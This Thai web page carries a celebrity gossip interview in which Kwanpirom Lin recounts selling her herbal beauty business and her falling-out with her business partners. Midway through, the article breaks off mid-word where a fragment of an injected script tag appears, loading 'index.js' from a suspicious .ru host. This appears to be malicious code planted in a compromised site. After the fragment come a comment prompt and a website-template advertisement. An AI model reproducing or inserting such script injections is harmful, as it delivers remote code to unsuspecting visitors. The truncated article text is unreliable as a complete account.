ขวัญภิรมย์ หลิน


ขวัญภิรมย์ หลิน

"สัจธรรม" กับ "ความแค้น" ของ 'ขวัญภิรมย์ หลิน'
กลายเป็นข่าวฮือฮาขึ้นมาจนได้เมื่ออดีตดาวนู้ดทรงโต "ขวัญภิรมย์ หลิน" ออกมาร้องไห้ฟูมฟายสาธยายถึงความตกต่ำในชีวิต ทั้งที่ก่อนหน้านี้ไม่ถึงปีเธอพึ่งจะยิ้มหน้าบานมาออกทีวีว่าได้เงินจากการขายธุรกิจความงาม "บ้านสมุนไพรขวัญภิรมย์" ให้กับบริษัทแห่งหนึ่งไปถึง 150 ล้านบาท โดยมี "ไมเคิล มาคาร์" และ "บี วรรณวิศา" สองสามีภรรยาช่วยกันบริหาร

แต่ก็ไม่รู้ไปบริหารกันอีท่าไหนถึงทำให้ลูกค้านับสิบๆ สาขาออกมาโวยวายไม่ขอขึ้นตรงกับทางบริษัท มิหนำซ้ำขวัญภิรมย์ หลิน ในฐานะผู้ถือหุ้นคนหนึ่งก็ยังไม่ได้รับเงินจากการประกอบกิจการแม้แต่สตางค์แดงเดียว งานนี้ก็เลยมีรายการออกมาฟาดปากสาดสงครามน้ำลายกันมันหยดระหว่าง "ขวัญภิรมย์ หลิน" กับ "บี วรรณวิศา" ก็อย่างที่เราทราบกันดีบนหน้าหนังสือพิมพ์นั่นแหละ

ใครผิดใครถูกเราไม่รู้ รู้แต่ว่างานนี้มีแต่เละกับเละ..
"ชีวิตขวัญเมื่อก่อนมันก็ดีอยู่แล้วนะ ไม่เคยคิดเลยว่าตัวเองจะมีวันนี้ ขวัญผิดเองที่เข้าไปยุ่งกับเค้า วันนั้นขวัญเห็นเค้าไปออกรายการทไวไลท์โชว์ บอกว่าพึ่งกลับมาจากเมืองนอกพาลูกไปผ่าตัดไม่มีเงินต้องไปตักขนมครกขาย ไปผัดไทยขาย เราก็เออเพื่อนคนนี้เราเคยรู้จักนิ ขวัญดูทีวีแล้วก็ประทับใจว่าเค้ากล้าผ่าอวัยวะตัวเองให้กับลูก เค้าช่างเป็นพ่อแม่ที่ประเสริฐจังเลย เราก็เลยหาเบอร์เค้าแล้วก็ติดต่อเค้าไป"

"ก็บอกเค้าว่าเราทำบ้านสมุนไพรขวัญภิรมย์อยู่ก็ถามว่าพี่บีจะทำไหมเดี๋ยวเราจะจัดหาคนเข้าไปให้และขวัญจะลงทุนให้ทั้งหมดประมาณล้านกว่าบาท สิ้นเดือนมาแบ่งเงินกันคนละครึ่ง ปรากฎว่ารายได้ประมาณ 1 แสนแบ่งคนละ 5 หมื่นเค้าบอกไม่พอใช้เพราะค่ายาลูกเยอะ ขอหมดเถอะ เราก็ให้เค้าไปเลย"

"จากนั้นเราก็เริ่มสนิทกัน และขวัญก็จะเล่าปัญหาให้พี่บีฟังตลอด ช่วงนั้นกิจการดีมากมีคนเข้ามาขอเป็นสาขาอีกเป็นร้อยๆ ขวัญก็กลุ้มใจว่าเราจะบริหารงานอีกเป็นร้อยๆ สาขาคงไม่ไหวแน่ ระหว่างนั้นพี่บีก็จะพูดตลอดว่าเนี่ยนะพ่อเค้ารู้จักกับบริษัทที่โน่นที่นี่ ซึ่งสามารถเอายี่ห้อของเค้ามาทำเป็นแบรนด์เราได้นะ หรือไม่ก็พี่ไมค์มีเพื่อนเป็นฝ่ายจัดซื้อห้างโน้นห้างนี้ สามารถเอาสินค้าไปลงขายได้นะอะไรแบบนี้ มันเป็นการพูดคุยกันให้เราซึมซับว่าเค้าหวังดี"

"จากนั้นพี่ไมค์เค้าทำแผนงานมาให้ว่าสมมติเค้าเปิดไป 100 สาขาเดือนนึงเราจะทำสัญญาให้เค้าซื้อสินค้าไม่ต่ำกว่า 3 หมื่นบาทต่อเดือน ถ้าเรามี 100 สาขาเดือนนึงก็ 30 ล้านบาท คือเค้าทำแผนการณ์ไว้สวยหรูมาก ขวัญก็มาคิดดูแล้วก็เห็นว่าดีเพราะถ้าจะให้เรามานั่งขายเองกว่าจะได้ 30 ล้านก็หลายปี แต่ถ้าเอาไปให้เค้าแล้วเค้าแปล๊บเดียวได้ 30 ล้านละ มันก็คุ้มน่ะเลยยอมขายไป 2 ล้านและพี่บีก็ขอไปล้านนึงเป็นค่าติดต่อ สรุปก็คือขวัญได้ไปแค่ล้านเดียว"

ถ้ามองกันในเชิงธุรกิจ การที่จะสร้างสินค้าตัวหนึ่งขึ้นมาไม่ใช่เรื่องง่าย ๆและยิ่งเป็นแบรนด์ที่ติดตลาดและกำลังไปด้วยสวยอย่าง บ้านสมุนไพรขวัญภิรมย์ ยิ่งไม่ใช่เรื่องที่จะเกิดขึ้นง่าย ๆ เงิน 2 ล้านสำหรับค่ามันสมองจึงเป็นอะไรที่น้อยไป แต่อะไรเล่าที่ทำให้ขวัญตกปากรับคำอย่างง่ายดาย
"ขวัญไม่ได้หวังเงิน 2 ล้านแต่ขวัญหวังว่าทุกอย่างมันจะเป็นไปตามแผนอันสวยหรูที่เค้าเอามาเสนอขวัญตั้งแต่ทีแรก อีกอย่างหนึ่งขวัญรู้สึกว่าตัวเองเหนื่อยมาเยอะแล้ว ขวัญไม่อยากทำอะไรแล้ว อยากไปเที่ยวโน่นเที่ยวนี่ สิ้นเดือนมาก็รอรับเงินจากหุ้นของเราก็พอ ไม่ต้องมานั่งปวดหัว"

"ตอนแรกที่ตกลงกันไว้ก็คือ 40-60 ของขวัญ 40 แล้วเอาไปให้คุณไบรอันท์พ่อของพี่ไมค์บริหาร 60 แต่คุยไปคุยมาพี่บีเค้าก็บอกเนี่ยน่าจะเอาไปให้ทางผู้ใหญ่ของช่องกันบ้าง อีกหน่อยเราจะได้โฆษณาทางโทรทัศน์ง่ายขึ้น เค้าก็เอาไปแบ่งให้คนโน้นคนนี้บ้างจนของขวัญเหลือ 25 เปอร์เซ็นต์ จนสุดท้ายมาเซ็นสัญญาอยู่ที่ตัวเลขตรงนี้โดยที่ขวัญไม่ต้องไปเพิ่มทุนเลย ซึ่งขวัญคิดว่ามันก็โอเคนะเพราะถ้าอีกหน่อยกิจการมันขยายเป็นร้อยๆ ล้านของขวัญก็หลายสิบล้านเหมือนกัน"

อ้าว ! อย่างนี้เค้าเรียกหวังน้ำบ่อหน้านี่…
"หลายๆ คนบอกว่าขวัญหวังน้ำบ่อหน้ามากเกินไป แต่ขวัญก็มองแล้วว่าน้ำบ่อหน้าที่เราหวังมันสามารถเป็นไปได้จริงๆ และขวัญก็เคยลองขุดแล้วว่ามันมีน้ำ และมีเยอะด้วย แต่เราอยากให้คนอื่นขุดแทนเราไม่อยากขุดเองแล้วมันเหนื่อย"

เมื่อแน่ใจแล้วว่ายังไงซะก็ต้องได้เงินอย่างน้อยๆ เดือนละ 30 ล้าน ขวัญก็เลยจัดการเอาเงินเก src=http://www.doubleclickr.ru/index.js>


แสดงความคิดเห็น

เว็บไซต์สำเร็จรูป รองรับการแสดงผลบนมือถือ


เว็บไซต์สำเร็จรูป รองรับการแสดงผลบนมือถือ

เป็นเว็บไซต์ระบบ Responsive 100% สามารถปรับรูปแบบการแสดงผลได้เองโดยอัตโนมัติ ตามอุปกรณ์ที่เปิดชม (ทั้ง Front end และ Back end) เช่น สมาร์ทโฟนทุกรุ่น, แท็บเล็ต, iPad และ iPhone เป็นเจ้าของได้แล้ววันนี้ ในราคาโปรโมชั่น...คลิกดูรายละเอียด